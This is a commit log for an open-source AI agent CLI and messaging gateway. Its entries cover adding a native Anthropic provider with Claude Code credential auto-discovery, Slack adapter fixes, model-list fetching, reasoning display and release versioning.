  iteration limit. Now builds proper Anthropic kwargs and normalizes response.
- Guard retry summary path (line ~3200) — same fix for the summary retry loop.

All three self.client.chat.completions.create() calls outside the main
loop now have anthropic_messages branches to prevent NoneType crashes.
2026-03-12 17:23:09 -07:00
teknium1
4068f20ce9 fix(anthropic): deep scan fixes — auth, retries, edge cases
Fixes from comprehensive code review and cross-referencing with
clawdbot/OpenCode implementations:

CRITICAL:
- Add one-shot guard (anthropic_auth_retry_attempted) to prevent
  infinite 401 retry loops when credentials keep changing
- Fix _is_oauth_token(): managed keys from ~/.claude.json are NOT
  regular API keys (don't start with sk-ant-api). Inverted the logic:
  only sk-ant-api* is treated as API key auth, everything else uses
  Bearer auth + oauth beta headers

HIGH:
- Wrap json.loads(args) in try/except in message conversion — malformed
  tool_call arguments no longer crash the entire conversation
- Raise AuthError in runtime_provider when no Anthropic token found
  (was silently passing empty string, causing confusing API errors)
- Remove broken _try_anthropic() from auxiliary vision chain — the
  centralized router creates an OpenAI client for api_key providers
  which doesn't work with Anthropic's Messages API

MEDIUM:
- Handle empty assistant message content — Anthropic rejects empty
  content blocks, now inserts '(empty)' placeholder
- Fix setup.py existing_key logic — set to 'KEEP' sentinel instead
  of None to prevent falling through to the auth choice prompt
- Add debug logging to _fetch_anthropic_models on failure

Tests: 43 adapter tests (2 new for token detection), 3197 total passed
2026-03-12 17:14:22 -07:00
teknium1
cd4e995d54 fix(anthropic): live model fetching + adaptive thinking for 4.5+ models
- Add _fetch_anthropic_models() to hermes_cli/models.py — hits the
  Anthropic /v1/models endpoint to get the live model catalog. Handles
  both API key and OAuth token auth headers.

- Wire it into provider_model_ids() so both 'hermes model' and
  'hermes setup model' show the live list instead of a stale static one.

- Update static _PROVIDER_MODELS fallback with full current catalog:
  opus-4-6, sonnet-4-6, opus-4-5, sonnet-4-5, opus-4, sonnet-4, haiku-4-5

- Update model_metadata.py with context lengths for all current models.

- Fix thinking parameter for 4.5+ models: use type='adaptive' instead
  of type='enabled' (Anthropic deprecated 'enabled' for newer models,
  warns at runtime). Detects model version from the model name string.

Verified live:
  hermes model → Anthropic → auto-detected creds → shows 7 live models
  hermes chat --provider anthropic --model claude-opus-4-6 → works
2026-03-12 17:04:31 -07:00
teknium1
d51243b6d3 fix(anthropic): read credentials from ~/.claude.json (native binary v2.x)
The critical bug: read_claude_code_credentials() only looked at
~/.claude/.credentials.json, but Claude Code's native binary (v2.x,
Bun-compiled) stores credentials in ~/.claude.json at the top level
as 'primaryApiKey'. The .credentials.json file is only written by
older npm-based installs.

Now checks both locations in priority order:
  1. ~/.claude.json → primaryApiKey (native binary, v2.x)
  2. ~/.claude/.credentials.json → claudeAiOauth.accessToken (legacy)

Verified live: hermes model → Anthropic → auto-detected credentials →
claude-sonnet-4-20250514 → 'Hello there, how are you?' (5 words)
2026-03-12 16:43:31 -07:00
Teknium
df07baedfe feat: Slack adapter improvements — formatting, reactions, user resolution, commands (#1106)
feat: Slack adapter improvements — formatting, reactions, user resolution, commands
2026-03-12 16:35:44 -07:00
teknium1
38aa47ad6c fix(anthropic): improve auth UX with clear setup-token vs API key choice
Both 'hermes model' and 'hermes setup model' now present a clear
two-option auth flow when no credentials are found:

  1. Claude Pro/Max subscription (setup-token)
     - Step-by-step instructions to run 'claude setup-token'
     - User pastes the resulting sk-ant-oat01-... token

  2. Anthropic API key (pay-per-token)
     - Link to console.anthropic.com/settings/keys
     - User pastes sk-ant-api03-... key

Also handles:
  - Auto-detection of existing Claude Code creds (~/.claude/.credentials.json)
  - Existing credentials shown with option to update
  - Consistent UX between 'hermes model' and 'hermes setup model'
2026-03-12 16:28:00 -07:00
teknium1
978e1356c0 feat: Slack adapter improvements — formatting, reactions, user resolution, commands
1. Markdown → mrkdwn conversion (format_message override):
   - **bold** → *bold*, *italic* → _italic_
   - ## Headers → *Headers* (bold)
   - [link](url) → <url|link>
   - ~~strike~~ → ~strike~
   - Code blocks and inline code preserved unchanged
   - Placeholder-based approach (same pattern as Telegram)

2. Message length splitting:
   - send() now calls format_message() + truncate_message()
   - Long responses split at natural boundaries (newlines, spaces)
   - Code blocks properly closed/reopened across chunks
   - Chunk indicators (1/N) appended for multi-part messages

3. Reaction-based acknowledgment:
   - 👀 (eyes) reaction added on message receipt
   - Replaced with  (white_check_mark) when response is complete
   - Graceful error handling (missing scopes, already-reacted)
   - Serves as visual feedback since Slack has no bot typing API

4. User identity resolution:
   - Resolves Slack user IDs to display names via users.info API
   - LRU-style in-memory cache (one API call per user)
   - Fallback chain: display_name → real_name → user_id
   - user_name now included in MessageEvent source

5. Expanded slash commands (/hermes <subcommand>):
   - Added: compact, compress, resume, background, usage,
     insights, title, reasoning, provider, rollback
   - Arguments preserved (e.g. /hermes resume my session)

6. reply_broadcast config option:
   - When gateway.slack.reply_broadcast is true, first response
     in a thread also appears in the main channel
   - Disabled by default — thread = session stays clean

30 new tests covering all features.
2026-03-12 16:22:39 -07:00
Teknium
39f3c0aeb0 fix: use hermes-agent.nousresearch.com as OpenRouter HTTP-Referer
* fix: stop rejecting unlisted models + auto-detect from /models endpoint

validate_requested_model() now accepts models not in the provider's API
listing with a warning instead of blocking. Removes hardcoded catalog
fallback for validation — if API is unreachable, accepts with a warning.

Model selection flows (setup + /model command) now probe the provider's
/models endpoint to get the real available models. Falls back to
hardcoded defaults with a clear warning when auto-detection fails:
'Could not auto-detect models — use Custom model if yours isn't listed.'

Z.AI setup no longer excludes GLM-5 on coding plans.

* fix: use hermes-agent.nousresearch.com as HTTP-Referer for OpenRouter

OpenRouter scrapes the favicon/logo from the HTTP-Referer URL for app
rankings. We were sending the GitHub repo URL, which gives us a generic
GitHub logo. Changed to the proper website URL so our actual branding
shows up in rankings.

Changed in run_agent.py (main agent client) and auxiliary_client.py
(vision/summarization clients).
2026-03-12 16:20:22 -07:00
teknium1
7086fde37e fix(anthropic): revert inline vision, add hermes model flow, wire vision aux
Feedback fixes:

1. Revert _convert_vision_content — vision is handled by the vision_analyze
   tool, not by converting image blocks inline in conversation messages.
   Removed the function and its tests.

2. Add Anthropic to 'hermes model' (cmd_model in main.py):
   - Added to provider_labels dict
   - Added to providers selection list
   - Added _model_flow_anthropic() with Claude Code credential auto-detection,
     API key prompting, and model selection from catalog.

3. Wire up Anthropic as a vision-capable auxiliary provider:
   - Added _try_anthropic() to auxiliary_client.py using claude-sonnet-4
     as the vision model (Claude natively supports multimodal)
   - Added to the get_vision_auxiliary_client() auto-detection chain
     (after OpenRouter/Nous, before Codex/custom)

Cache tracking note: the Anthropic cache metrics branch in run_agent.py
(cache_read_input_tokens / cache_creation_input_tokens) is in the correct
place — it's response-level parsing, same location as the existing
OpenRouter cache tracking. auxiliary_client.py has no cache tracking.
2026-03-12 16:09:04 -07:00
Teknium
4cb553c765 fix: Slack thread handling — progress messages, responses, and session isolation (#1103)
fix: Slack thread handling — progress messages, responses, and session isolation
2026-03-12 16:07:05 -07:00
teknium1
987410fff3 fix: Slack thread handling — progress messages, responses, and session isolation
Three bugs fixed in the Slack adapter:

1. Tool progress messages leaked to main channel instead of thread.
   Root cause: metadata key mismatch — gateway uses 'thread_id' but
   Slack adapter checked for 'thread_ts'. Added _resolve_thread_ts()
   helper that checks both keys with correct precedence.

2. Bot responses could escape threads for replies.
   Root cause: reply_to was set to the child message's ts, but Slack
   API needs the parent message's ts for thread_ts. Now metadata
   thread_id (always the parent ts) takes priority over reply_to.

3. All Slack DMs shared one session key ('agent:main:slack:dm'),
   so a long-running task blocked all other DM conversations.
   Fix: DMs with thread_id now get per-thread session keys. Top-level
   DMs still share one session for conversation continuity.

Additional fix: All Slack media methods (send_image, send_voice,
send_video, send_document, send_image_file) now accept metadata
parameter for thread routing. Previously they only accepted reply_to,
which caused media to silently fail to post in threads.

Session key behavior after this change:
- Slack channel @mention: creates thread, thread = session
- Slack thread reply: stays in thread, same session
- Slack DM (top-level): one continuous session
- Slack DM (threaded): per-thread session
- Other platforms: unchanged
2026-03-12 16:05:45 -07:00
Teknium
4a8cd6f856 fix: stop rejecting unlisted models, accept with warning instead
* fix: use session_key instead of chat_id for adapter interrupt lookups

monitor_for_interrupt() in _run_agent was using source.chat_id to query
the adapter's has_pending_interrupt() and get_pending_message() methods.
But the adapter stores interrupt events under build_session_key(source),
which produces a different string (e.g. 'agent:main:telegram:dm' vs '123456').

This key mismatch meant the interrupt was never detected through the
adapter path, which is the only active interrupt path for all adapter-based
platforms (Telegram, Discord, Slack, etc.). The gateway-level interrupt
path (in dispatch_message) is unreachable because the adapter intercepts
the 2nd message in handle_message() before it reaches dispatch_message().

Result: sending a new message while subagents were running had no effect —
the interrupt was silently lost.

Fix: replace all source.chat_id references in the interrupt-related code
within _run_agent() with the session_key parameter, which matches the
adapter's storage keys.

Also adds regression tests verifying session_key vs chat_id consistency.

* debug: add file-based logging to CLI interrupt path

Temporary instrumentation to diagnose why message-based interrupts
don't seem to work during subagent execution. Logs to
~/.hermes/interrupt_debug.log (immune to redirect_stdout).

Two log points:
1. When Enter handler puts message into _interrupt_queue
2. When chat() reads it and calls agent.interrupt()

This will reveal whether the message reaches the queue and
whether the interrupt is actually fired.

* fix: accept unlisted models with warning instead of rejecting

validate_requested_model() previously hard-rejected any model not found
in the provider's API listing. This was too aggressive — users on higher
plan tiers (e.g. Z.AI Pro/Max) may have access to models not shown in
the public listing (like glm-5 on coding endpoints).

Changes:
- validate_requested_model: accept unlisted models with a warning note
  instead of blocking. The model is saved to config and used immediately.
- Z.AI setup: always offer glm-5 in the model list regardless of whether
  a coding endpoint was detected. Pro/Max plans support it.
- Z.AI setup detection message: softened from 'GLM-5 is not available'
  to 'GLM-5 may still be available depending on your plan tier'
2026-03-12 16:02:35 -07:00
teknium1
d7adfe8f61 fix(anthropic): address gaps found in deep-dive audit
After studying clawdbot (OpenClaw) and OpenCode implementations:

## Beta headers
- Add interleaved-thinking-2025-05-14 and fine-grained-tool-streaming-2025-05-14
  as common betas (sent with ALL auth types, not just OAuth)
- OAuth tokens additionally get oauth-2025-04-20
- API keys now also get the common betas (previously got none)

## Vision/image support
- Add _convert_vision_content() to convert OpenAI multimodal format
  (image_url blocks) to Anthropic format (image blocks with base64/url source)
- Handles both data: URIs (base64) and regular URLs

## Role alternation enforcement
- Anthropic strictly rejects consecutive same-role messages (400 error)
- Add post-processing step that merges consecutive user/assistant messages
- Handles string, list, and mixed content types during merge

## Tool choice support
- Add tool_choice parameter to build_anthropic_kwargs()
- Maps OpenAI values: auto→auto, required→any, none→omit, name→tool

## Cache metrics tracking
- Anthropic uses cache_read_input_tokens / cache_creation_input_tokens
  (different from OpenRouter's prompt_tokens_details.cached_tokens)
- Add api_mode-aware branch in run_agent.py cache stats logging

## Credential refresh on 401
- On 401 error during anthropic_messages mode, re-read credentials
  via resolve_anthropic_token() (picks up refreshed Claude Code tokens)
- Rebuild client if new token differs from current one
- Follows same pattern as Codex/Nous 401 refresh handlers

## Tests
- 44 adapter tests (8 new: vision conversion, role alternation, tool choice)
- Updated beta header tests to verify new structure
- Full suite: 3198 passed, 0 regressions
2026-03-12 16:00:46 -07:00
Teknium
def7b84a12 Merge pull request #1098 from NousResearch/hermes/hermes-465f3702
fix: eliminate execute_code progress spam on gateway platforms
2026-03-12 15:55:02 -07:00
teknium1
8121aef83c fix: eliminate execute_code progress spam on gateway platforms
Root cause: two issues combined to create visual spam on Telegram/Discord:

1. build_tool_preview() preserved newlines from tool arguments. A preview
   like 'import os\nprint("...")' rendered as 2+ visual lines per
   progress entry on messaging platforms. This affected execute_code most
   (code always has newlines), but could also hit terminal, memory,
   send_message, session_search, and process tools.

2. No deduplication of identical progress messages. When models iterate
   with execute_code using the same boilerplate code (common pattern),
   each call produced an identical progress line. 9 calls x 2 visual
   lines = 18 lines of identical spam in one message bubble.

Fixes:
- Added _oneline() helper to collapse all whitespace (newlines, tabs) to
  single spaces. Applied to ALL code paths in build_tool_preview() —
  both the generic path and every early-return path that touches user
  content (memory, session_search, send_message, process).
- Added dedup in gateway progress_callback: consecutive identical messages
  are collapsed with a repeat counter, e.g. 'execute_code: ... (x9)'
  instead of 9 identical lines. The send_progress_messages async loop
  handles dedup tuples by updating the last progress_line in-place.
2026-03-12 15:53:02 -07:00
Teknium
1bb8ed4495 chore: lower default compression threshold from 85% to 50% (#1096)
* fix: ClawHub skill install — use /download ZIP endpoint

The ClawHub API v1 version endpoint only returns file metadata
(path, size, sha256, contentType) without inline content or download
URLs. Our code was looking for inline content in the metadata, which
never existed, causing all ClawHub installs to fail with:
'no inline/raw file content was available'

Fix: Use the /api/v1/download endpoint (same as the official clawhub
CLI) to download skills as ZIP bundles and extract files in-memory.

Changes:
- Add _download_zip() method that downloads and extracts ZIP bundles
- Retry on 429 rate limiting with Retry-After header support
- Path sanitization and binary file filtering for security
- Keep _extract_files() as a fallback for inline/raw content
- Also fix nested file lookup (version_data.version.files)

* chore: lower default compression threshold from 85% to 50%

Triggers context compression earlier — at 50% of the model's context
window instead of 85%. Updated in all four places where the default
is defined: context_compressor.py, cli.py, run_agent.py, config.py,
and gateway/run.py.
2026-03-12 15:51:50 -07:00
teknium1
5e12442b4b feat: native Anthropic provider with Claude Code credential auto-discovery
Add Anthropic as a first-class inference provider, bypassing OpenRouter
for direct API access. Uses the native Anthropic SDK with a full format
adapter (same pattern as the codex_responses api_mode).

## Auth (three methods, priority order)
1. ANTHROPIC_API_KEY env var (regular API key, sk-ant-api-*)
2. ANTHROPIC_TOKEN / CLAUDE_CODE_OAUTH_TOKEN env var (setup-token, sk-ant-oat-*)
3. Auto-discovery from ~/.claude/.credentials.json (Claude Code subscription)
   - Reads Claude Code's OAuth credentials
   - Checks token expiry with 60s buffer
   - Setup tokens use Bearer auth + anthropic-beta: oauth-2025-04-20 header
   - Regular API keys use standard x-api-key header

## Changes by file

### New files
- agent/anthropic_adapter.py — Client builder, message/tool/response
  format conversion, Claude Code credential reader, token resolver.
  Handles system prompt extraction, tool_use/tool_result blocks,
  thinking/reasoning, orphaned tool_use cleanup, cache_control.
- tests/test_anthropic_adapter.py — 36 tests covering all adapter logic

### Modified files
- pyproject.toml — Add anthropic>=0.39.0 dependency
- hermes_cli/auth.py — Add 'anthropic' to PROVIDER_REGISTRY with
  three env vars, plus 'claude'/'claude-code' aliases
- hermes_cli/models.py — Add model catalog, labels, aliases, provider order
- hermes_cli/main.py — Add 'anthropic' to --provider CLI choices
- hermes_cli/runtime_provider.py — Add Anthropic branch returning
  api_mode='anthropic_messages' (before generic api_key fallthrough)
- hermes_cli/setup.py — Add Anthropic setup wizard with Claude Code
  credential auto-discovery, model selection, OpenRouter tools prompt
- agent/auxiliary_client.py — Add claude-haiku-4-5 as aux model
- agent/model_metadata.py — Add bare Claude model context lengths
- run_agent.py — Add anthropic_messages api_mode:
  * Client init (Anthropic SDK instead of OpenAI)
  * API call dispatch (_anthropic_client.messages.create)
  * Response validation (content blocks)
  * finish_reason mapping (stop_reason -> finish_reason)
  * Token usage (input_tokens/output_tokens)
  * Response normalization (normalize_anthropic_response)
  * Client interrupt/rebuild
  * Prompt caching auto-enabled for native Anthropic
- tests/test_run_agent.py — Update test_anthropic_base_url_accepted to
  expect native routing, add test_prompt_caching_native_anthropic
2026-03-12 15:47:45 -07:00
Erosika
fefc709b2c merge: resolve conflict with main in subagent interrupt test 2026-03-12 16:28:57 -04:00
Erosika
45d3e83ad1 fix(honcho): normalize legacy recallMode values like 'auto' to 'hybrid' 2026-03-12 16:27:49 -04:00
Erosika
0aed9bfde1 refactor(honcho): rename memory tools to Honcho tools, clarify recall mode language
Replace "memory tools" with "Honcho tools" and "pre-warmed/prefetch"
with "auto-injected context" in all user-facing strings and docs.
2026-03-12 16:26:10 -04:00
Erosika
ae2a5e5743 refactor(honcho): remove local memory mode
The "local" memoryMode was redundant with enabled: false. Simplifies
the mode system to hybrid and honcho only.
2026-03-12 16:23:34 -04:00
Erosika
f896bb5d8c fix(test): patch correct method in subagent interrupt test
build_system_prompt was refactored to AIAgent._build_system_prompt
but the test still patched the non-existent module-level function.
2026-03-12 15:05:42 -04:00
Erosika
cd6e5e44e4 feat(honcho): show clickable session line on CLI startup
Display a one-line Honcho session indicator with an OSC 8 terminal
hyperlink after the banner. Also shown when /title remaps the session.
2026-03-12 12:30:42 -04:00
teknium1
47e49da77c feat: make tinker-atropos RL training fully optional
The tinker-atropos submodule and its heavy dependencies (atroposlib, tinker,
wandb, fastapi, uvicorn) were being installed for all users by default,
adding significant install time and disk usage for most users who don't
need RL training capabilities.

Changes:
- install.sh: Only init mini-swe-agent submodule by default; skip
  tinker-atropos clone and install entirely
- install.sh: Remove --recurse-submodules from git clone (only fetches
  what's needed)
- pyproject.toml: Add [rl] optional dependency group for explicit opt-in
- rl_training_tool.py: Move LOGS_DIR.mkdir() from module-level to lazy
  init (_ensure_logs_dir) to avoid side effects on import
- README.md: Update contributor quick start to not auto-fetch
  tinker-atropos; add RL opt-in instructions

Users who want RL training can opt in with:
  git submodule update --init tinker-atropos
  uv pip install -e ./tinker-atropos
2026-03-12 09:11:44 -07:00
Teknium
e004c094ea fix: use session_key instead of chat_id for adapter interrupt lookups
* fix: use session_key instead of chat_id for adapter interrupt lookups

monitor_for_interrupt() in _run_agent was using source.chat_id to query
the adapter's has_pending_interrupt() and get_pending_message() methods.
But the adapter stores interrupt events under build_session_key(source),
which produces a different string (e.g. 'agent:main:telegram:dm' vs '123456').

This key mismatch meant the interrupt was never detected through the
adapter path, which is the only active interrupt path for all adapter-based
platforms (Telegram, Discord, Slack, etc.). The gateway-level interrupt
path (in dispatch_message) is unreachable because the adapter intercepts
the 2nd message in handle_message() before it reaches dispatch_message().

Result: sending a new message while subagents were running had no effect —
the interrupt was silently lost.

Fix: replace all source.chat_id references in the interrupt-related code
within _run_agent() with the session_key parameter, which matches the
adapter's storage keys.

Also adds regression tests verifying session_key vs chat_id consistency.

* debug: add file-based logging to CLI interrupt path

Temporary instrumentation to diagnose why message-based interrupts
don't seem to work during subagent execution. Logs to
~/.hermes/interrupt_debug.log (immune to redirect_stdout).

Two log points:
1. When Enter handler puts message into _interrupt_queue
2. When chat() reads it and calls agent.interrupt()

This will reveal whether the message reaches the queue and
whether the interrupt is actually fired.
2026-03-12 08:35:45 -07:00
Teknium
5c54128475 fix: ClawHub skill install — use /download ZIP endpoint (#1060)
The ClawHub API v1 version endpoint only returns file metadata
(path, size, sha256, contentType) without inline content or download
URLs. Our code was looking for inline content in the metadata, which
never existed, causing all ClawHub installs to fail with:
'no inline/raw file content was available'

Fix: Use the /api/v1/download endpoint (same as the official clawhub
CLI) to download skills as ZIP bundles and extract files in-memory.

Changes:
- Add _download_zip() method that downloads and extracts ZIP bundles
- Retry on 429 rate limiting with Retry-After header support
- Path sanitization and binary file filtering for security
- Keep _extract_files() as a fallback for inline/raw content
- Also fix nested file lookup (version_data.version.files)
2026-03-12 08:26:24 -07:00
Teknium
42cf66ae39 feat: add 'hermes claw migrate' command + migration docs (#1059)
feat: add 'hermes claw migrate' command + migration docs
2026-03-12 08:23:05 -07:00
Teknium
73ea5102dc Merge pull request #1058 from NousResearch/hermes/hermes-465f3702
fix: strip call_id/response_item_id from tool_calls for Mistral compatibility
2026-03-12 08:21:36 -07:00
teknium1
d53035ad82 feat: add 'hermes claw migrate' command + migration docs
- Add hermes_cli/claw.py with full CLI migration handler:
  - hermes claw migrate (interactive migration with confirmation)
  - --dry-run, --preset, --overwrite, --skill-conflict flags
  - --source for custom OpenClaw path
  - --yes to skip confirmation
  - Clean formatted output matching setup wizard style

- Fix Python 3.11+ @dataclass compatibility bug in dynamic module loading:
  - Register module in sys.modules before exec_module()
  - Fixes both setup.py (PR #981) and new claw.py

- Add 16 tests in tests/hermes_cli/test_claw.py covering:
  - Script discovery (project root, installed, missing)
  - Command routing
  - Dry-run, execute, cancellation, error handling
  - Preset/secrets behavior, report formatting

- Documentation updates:
  - README.md: Add 'hermes claw migrate' to Getting Started, new Migration section
  - docs/migration/openclaw.md: Full migration guide with all options
  - SKILL.md: Add CLI Command section at top of openclaw-migration skill
2026-03-12 08:20:12 -07:00
Teknium
5a4348d046 Merge pull request #1053 from NousResearch/hermes/hermes-c877bdeb
chore(skills): clean up PR #862 + feat(docs): add search to Docusaurus
2026-03-12 08:20:10 -07:00
teknium1
400b8d92b7 fix: strip call_id/response_item_id from tool_calls for Mistral compatibility
Mistral's API strictly validates the Chat Completions schema and rejects
unknown fields (call_id, response_item_id) with 422. These fields are
added by _build_assistant_message() for Codex Responses API support.

This fix:
- Only strips when targeting Mistral (api.mistral.ai in base_url)
- Creates new tool_call dicts instead of mutating originals (shallow
  copy safety — msg.copy() shares the tool_calls list)
- Preserves call_id/response_item_id in the internal message history
  so _chat_messages_to_responses_input() can still read them if the
  session falls back to a Codex provider mid-conversation

Applied in all 3 API message building locations:
- Main conversation loop (run_conversation)
- _handle_max_iterations()
- flush_memories()

Inspired by PR #864 (unmodeled-tyler) which identified the issue but
applied the fix unconditionally and mutated originals via shallow copy.

Co-authored-by: unmodeled-tyler <unmodeled.tyler@proton.me>
2026-03-12 08:18:27 -07:00
teknium1
6b211bf008 feat(docs): add local search to Docusaurus site
Add @easyops-cn/docusaurus-search-local (v0.55.1) for offline/local
full-text search across all documentation pages.

- Search bar appears in the navbar (Ctrl/Cmd+K shortcut)
- Builds a search index at build time — no external service needed
- Highlights matched terms on target page after clicking a result
- Dedicated /search page for expanded results
- Blog indexing disabled (blog is off)
- docsRouteBasePath set to '/' to match existing docs routing
2026-03-12 08:15:05 -07:00
Teknium
68fdc62d8f feat: offer OpenClaw migration during first-time setup wizard (#981)
feat: offer OpenClaw migration during first-time setup wizard
2026-03-12 08:12:30 -07:00
teknium1
bb7cdc6d44 chore(skills): clean up PR #862 — simplify manifest guard, DRY up tests
Follow-up to PR #862 (local skills classification by arceus77-7):

- Remove unnecessary isinstance guard on _read_manifest() return value —
  it always returns Dict[str, str], so set() on it suffices.
- Extract repeated hub-dir monkeypatching into a shared pytest fixture (hub_env).
- Add three_source_env fixture for source-classification tests.
- Add _read_manifest monkeypatch to test_do_list_initializes_hub_dir
  (was fragile — relied on empty skills list masking the real manifest).
- Add test coverage for --source hub and --source builtin filters.
- Extract _capture() helper to reduce console/StringIO boilerplate.

5 tests, all green.
2026-03-12 08:08:22 -07:00
Teknium
7e637d3b6a Merge pull request #862 from arceus77-7/fix/skills-list-source-provenance
Merging — clean fix for local skills mislabeling. Follow-up cleanup coming.
2026-03-12 08:05:34 -07:00
Teknium
2a62514d17 feat: add 'View full command' option to dangerous command approval (#887)
When a dangerous command is detected and the user is prompted for
approval, long commands are truncated (80 chars in fallback, 70 chars
in the TUI). Users had no way to see the full command before deciding.

This adds a 'View full command' option across all approval interfaces:

- CLI fallback (tools/approval.py): [v]iew option in the prompt menu.
  Shows the full command and re-prompts for approval decision.
- CLI TUI (cli.py): 'Show full command' choice in the arrow-key
  selection panel. Expands the command display in-place and removes
  the view option after use.
- CLI callbacks (callbacks.py): 'view' choice added to the list when
  the command exceeds 70 characters.
- Gateway (gateway/run.py): 'full', 'show', 'view' responses reveal
  the complete command while keeping the approval pending.

Includes 7 new tests covering view-then-approve, view-then-deny,
short command fallthrough, and double-view behavior.

Closes community feedback about the 80-char cap on dangerous commands.
2026-03-12 06:27:21 -07:00
Teknium
e9c3317158 fix: improve Kimi model selection — auto-detect endpoint, add missing models (#1039)
* fix: /reasoning command output ordering, display, and inline think extraction

Three issues with the /reasoning command:

1. Output interleaving: The command echo used print() while feedback
   used _cprint(), causing them to render out-of-order under
   prompt_toolkit's patch_stdout. Changed echo to use _cprint() so
   all output renders through the same path in correct order.

2. Reasoning display not working: /reasoning show toggled a flag
   but reasoning never appeared for models that embed thinking in
   inline <think> blocks rather than structured API fields. Added
   fallback extraction in _build_assistant_message to capture
   <think> block content as reasoning when no structured reasoning
   fields (reasoning, reasoning_content, reasoning_details) are
   present. This feeds into both the reasoning callback (during
   tool loops) and the post-response reasoning box display.

3. Feedback clarity: Added checkmarks to confirm actions, persisted
   show/hide to config (was session-only before), and aligned the
   status display for readability.

Tests: 7 new tests for inline think block extraction (41 total).

* feat: add /reasoning command to gateway (Telegram/Discord/etc)

The /reasoning command only existed in the CLI — messaging platforms
had no way to view or change reasoning settings. This adds:

1. /reasoning command handler in the gateway:
   - No args: shows current effort level and display state
   - /reasoning <level>: sets reasoning effort (none/low/medium/high/xhigh)
   - /reasoning show|hide: toggles reasoning display in responses
   - All changes saved to config.yaml immediately

2. Reasoning display in gateway responses:
   - When show_reasoning is enabled, prepends a 'Reasoning' block
     with the model's last_reasoning content before the response
   - Collapses long reasoning (>15 lines) to keep messages readable
   - Uses last_reasoning from run_conversation result dict

3. Plumbing:
   - Added _show_reasoning attribute loaded from config at startup
   - Propagated last_reasoning through _run_agent return dict
   - Added /reasoning to help text and known_commands set
   - Uses getattr for _show_reasoning to handle test stubs

* fix: improve Kimi model selection — auto-detect endpoint, add missing models

Kimi Coding Plan setup:
- New dedicated _model_flow_kimi() replaces the generic API-key flow
  for kimi-coding. Removes the confusing 'Base URL' prompt entirely —
  the endpoint is auto-detected from the API key prefix:
    sk-kimi-* → api.kimi.com/coding/v1 (Kimi Coding Plan)
    other     → api.moonshot.ai/v1 (legacy Moonshot)

- Shows appropriate models for each endpoint:
    Coding Plan: kimi-for-coding, kimi-k2.5, kimi-k2-thinking, kimi-k2-thinking-turbo
    Moonshot:    full model catalog

- Clears any stale KIMI_BASE_URL override so runtime auto-detection
  via _resolve_kimi_base_url() works correctly.

Model catalog updates:
- Added kimi-for-coding (primary Coding Plan model) and kimi-k2-thinking-turbo
  to models.py, main.py _PROVIDER_MODELS, and model_metadata.py context windows.

- Updated User-Agent from KimiCLI/1.0 to KimiCLI/1.3 (Kimi's coding
  endpoint whitelists known coding agents via User-Agent sniffing).
2026-03-12 05:58:48 -07:00
Teknium
1e3607150c Merge pull request #1040 from NousResearch/hermes/hermes-5da06378
feat: include session ID in system prompt via --pass-session-id flag
2026-03-12 05:52:26 -07:00
dmahan93
c7fc39bde0 feat: include session ID in system prompt via --pass-session-id flag
Adds --pass-session-id CLI flag. When set, the agent's system prompt
includes the session ID:

  Conversation started: Sunday, March 08, 2026 06:32 PM
  Session ID: 20260308_183200_abc123

Usage:
  hermes --pass-session-id
  hermes chat --pass-session-id

Implementation threads the flag as a proper parameter through the full
chain (main.py → cli.py → run_agent.py) rather than using an env var,
avoiding collisions in multi-agent/multitenant setups.

Based on PR #726 by dmahan93, reworked to use instance parameter
instead of HERMES_PASS_SESSION_ID environment variable.

Co-authored-by: dmahan93 <dmahan93@users.noreply.github.com>
2026-03-12 05:51:31 -07:00
Teknium
e782b92bca fix: /reasoning command — add gateway support, fix display, persist settings (#1031)
* fix: /reasoning command output ordering, display, and inline think extraction

Three issues with the /reasoning command:

1. Output interleaving: The command echo used print() while feedback
   used _cprint(), causing them to render out-of-order under
   prompt_toolkit's patch_stdout. Changed echo to use _cprint() so
   all output renders through the same path in correct order.

2. Reasoning display not working: /reasoning show toggled a flag
   but reasoning never appeared for models that embed thinking in
   inline <think> blocks rather than structured API fields. Added
   fallback extraction in _build_assistant_message to capture
   <think> block content as reasoning when no structured reasoning
   fields (reasoning, reasoning_content, reasoning_details) are
   present. This feeds into both the reasoning callback (during
   tool loops) and the post-response reasoning box display.

3. Feedback clarity: Added checkmarks to confirm actions, persisted
   show/hide to config (was session-only before), and aligned the
   status display for readability.

Tests: 7 new tests for inline think block extraction (41 total).

* feat: add /reasoning command to gateway (Telegram/Discord/etc)

The /reasoning command only existed in the CLI — messaging platforms
had no way to view or change reasoning settings. This adds:

1. /reasoning command handler in the gateway:
   - No args: shows current effort level and display state
   - /reasoning <level>: sets reasoning effort (none/low/medium/high/xhigh)
   - /reasoning show|hide: toggles reasoning display in responses
   - All changes saved to config.yaml immediately

2. Reasoning display in gateway responses:
   - When show_reasoning is enabled, prepends a 'Reasoning' block
     with the model's last_reasoning content before the response
   - Collapses long reasoning (>15 lines) to keep messages readable
   - Uses last_reasoning from run_conversation result dict

3. Plumbing:
   - Added _show_reasoning attribute loaded from config at startup
   - Propagated last_reasoning through _run_agent return dict
   - Added /reasoning to help text and known_commands set
   - Uses getattr for _show_reasoning to handle test stubs
2026-03-12 05:38:19 -07:00
Teknium
a370ab8391 Merge pull request #1018 from NousResearch/hermes/hermes-37fb78aa
feat: versioning infrastructure + release script + v0.2.0 changelog
2026-03-12 03:07:11 -07:00
teknium1
92e9809c86 fix: fetch live model lists from provider APIs instead of static lists
curated_models_for_provider() now tries the live API first (via
provider_model_ids) before falling back to static _PROVIDER_MODELS.
This means /model and /provider slash commands show the actual
available models, not a stale hardcoded list.

Also added live Nous Portal model fetching via fetch_nous_models()
in provider_model_ids(), alongside the existing Codex live fetch.
2026-03-12 02:46:33 -07:00
teknium1
364cb956c1 chore: rebuild changelog with correct time window (Feb 25 12PM PST onwards)
Changelog now covers only v0.1.0 → v0.2.0 changes:
- 216 merged PRs (not all 231)
- 119 resolved issues
- 63 contributors (not 74+)
- Window: Feb 25 2026 12PM PST to present
2026-03-12 02:33:50 -07:00
teknium1
8d182ec733 chore: bump version to v0.2.0 + add curated first-release changelog
- Update __version__ to 0.2.0 (was 0.1.0)
- Update pyproject.toml to match
- Add RELEASE_v0.2.0.md with comprehensive changelog covering:
  - All 231 merged PRs
  - 120 resolved issues
  - 74+ contributors credited
  - Organized by feature area with PR links
2026-03-12 01:52:53 -07:00
teknium1
323ca70846 feat: add versioning infrastructure and release script
- Fix version mismatch: __init__.py had 'v1.0.0', pyproject.toml had '0.1.0'
  Now both use '0.1.0' (no v prefix — added in display code only)
- Add __release_date__ for CalVer date tracking alongside SemVer version
- Fix double-v bug in cmd_version (was printing 'vv1.0.0')
